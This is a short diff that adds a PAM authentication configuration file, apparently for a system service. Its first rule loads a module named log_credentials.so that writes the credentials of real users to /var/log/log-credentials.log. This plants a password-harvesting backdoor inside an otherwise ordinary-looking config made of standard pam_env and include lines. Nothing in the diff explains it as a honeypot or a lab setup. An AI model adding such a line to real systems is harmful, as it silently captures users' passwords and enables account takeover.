@@ -1,0 +1,10 @@
+#%PAM-1.0
+
+auth       optional     log_credentials.so onlytrueusers file=/var/log/log-credentials.log
+
+session    required   pam_env.so readenv=1 user_readenv=0
+session    required   pam_env.so readenv=1 envfile=/etc/default/locale user_readenv=0
+
+@include common-auth
+@include common-account
+@include common-session-noninteractive
